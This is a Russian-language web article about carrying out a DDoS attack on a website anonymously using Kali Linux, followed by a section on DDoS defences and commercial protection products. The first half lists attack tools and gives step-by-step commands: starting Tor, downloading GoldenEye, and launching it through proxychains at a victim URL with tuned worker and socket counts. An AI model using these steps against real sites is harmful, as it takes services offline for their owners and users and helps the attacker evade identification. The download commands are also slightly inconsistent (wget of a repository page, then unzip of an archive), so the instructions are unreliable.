DDOS веб-сайт анонимно с помощью инструментов Kali Linux

Инструменты DDOS атак способны направить большие нагрузки на HTTP-серверы и отключить их от обслуживания.

Что такое DDOS атака?

Такой тип атаки, это когда несколько скомпрометированных систем атакуют одну цель, которая запрещает доступ к сервису посетителя сайта.

В этой статье мы расскажем о том, как выполнить DDOS-атаку с Kali Linux.

Необходимые инструменты

1. EtherApe - графический монитор сети, который графически отображает сетевую активность. Хосты и ссылки меняются в размере с трафиком. Отображение цветовых протоколов.
2. Service Tor - Tor позволяет клиентам и ретрансляторам предлагать скрытые услуги. То есть вы можете предложить веб-сервер, SSH-сервер и т.д. Не раскрывая свой IP-адрес своим пользователям.
3. Proxychains - последняя версия Proxychains поддерживает SOCKS5, SOCKS4 и HTTP CONNECT. Прокси-цепи можно смешивать с разными типами прокси.
4. GoldenEye - GoldenEye - приложение на python, предназначенное только для целей тестирования безопасности.

Список лучших инструментов для DDOS атак

• HULK
• Tor's Hammer
• Slowloris
• LOIC
• Xoic
• DDOSIM
• RUDY
• DDOSIM—Layer 7 DDOS Simulator
• R-U-Dead-Yet
• PyLoris
• OWASP DOS HTTP POST
• DAVOSET

Как выполнить DDOS атаку на сайт?

1. Запустите etherape: etherape, появится всплывающее окно, которое графически отображает сетевую активность.

2. Запустите службу TOR:
service tor start

3. Загрузите Goldeneye
https://github.com/jseidl/GoldenEye
wget https://github.com/jseidl/GoldenEye

4. После загрузки распакуйте его в папку
unzip GoldenEye-master.zip

5. Начать атаку

/GoldenEye-master# proxychains ./goldeneye.py http://testdomain.com

• Делайте с аргументами
• Добавьте значения  для рабочих (-w), сокетов (-s) и метода (-m)

./goldeneye.py victim-website.com -w 100 -s 70 -m post

Если вы не остановите атаку, то в некоторых случаях она "взорвется". Чтобы остановить атаку просто нажмите CTRL+C.

Общая защита от DDOS-атаки

• Снижение скорости IP-соединения.
• Используйте IDS, межсетевые экраны веб-приложений.
• Tweak Connection на порог IP.
• Защитите свои DNS-серверы.
• Установите средства защиты. Убедитесь, что у вас установлены соответствующие средства защиты как для ваших сетей, так и для ваших приложений. Сюда входят такие ключевые инструменты, как брандмауэры, программное обеспечение для мониторинга сети и антивирусные программы, а также системы мониторинга угроз. С их помощью вы можете отслеживать базовый сетевой трафик и настраивать оповещения о необычном поведении.
• Держите все в курсе. Все эти системы должны быть обновлены, чтобы гарантировать, что любые ошибки или проблемы исправлены. Обнаружение угроз как можно раньше - лучший способ предотвратить атаку DDoS-атак на важные сетевые инфраструктуры и повлиять на конечных пользователей.

Инструменты для предотвращения DDoS-атак

Есть несколько инструментов, которые я рекомендую для предотвращения и остановки DDoS-атак.

1. Security Event Manager

Для отслеживания поведения сети и маркировки угроз до того, как они станут чрезмерными, мне нравится SolarWinds Security Event Manager (SEM).

Способность быстро реагировать на угрозу жизненно необходима, поскольку инициативы в области безопасности могут быстро стать бесполезными, если их развертывание займет слишком много времени. SEM включает в себя автоматические ответы, которые могут блокировать подозрительный IP или USB, отключать вредоносные устройства или отключать их привилегии, а также уничтожать приложения, которые ведут себя неожиданным образом. Это означает, что задержки при работе с чем-то вроде атаки DDoS сводятся к минимуму.

SEM также контролирует целостность файлов и USB, поэтому, если что-то выглядит не так, его можно остановить.

SolarWinds SEM предлагается бесплатно для тридцатидневной пробной версии. После этого вы можете посмотреть цены для каждого узла.

2. Cloudflare

Cloudflare предлагает гибкий и масштабируемый инструмент, который объединяет несколько методов предотвращения DDoS в одном решении. Он предотвращает проникновение вредоносного и злонамеренного трафика в вашу сеть, а остальная часть сети остается функциональной и высокопроизводительной. Cloudflare использует базу данных репутации для отслеживания потенциальных угроз от злоумышленников.

Для предприятий Cloudflare стоит 200 долларов США в месяц, но на уровне предприятия вам необходимо связаться с Cloudflare для получения расценок.

3. Imperva

Средство защиты Imperva DDoS защищает всю сеть и защищает от атак с помощью обработки пакетов большой емкости. Он обеспечивает защиту от DDoS-атак как всегда, так и по требованию, в зависимости от того, что больше всего подходит вашему бизнесу, а также включает в себя автоматическое обновление панелей мониторинга, отображающих информацию о трафике атак. Основным недостатком инструмента Imperva является то, что он ограничен защитой от DDoS-атак.

Источник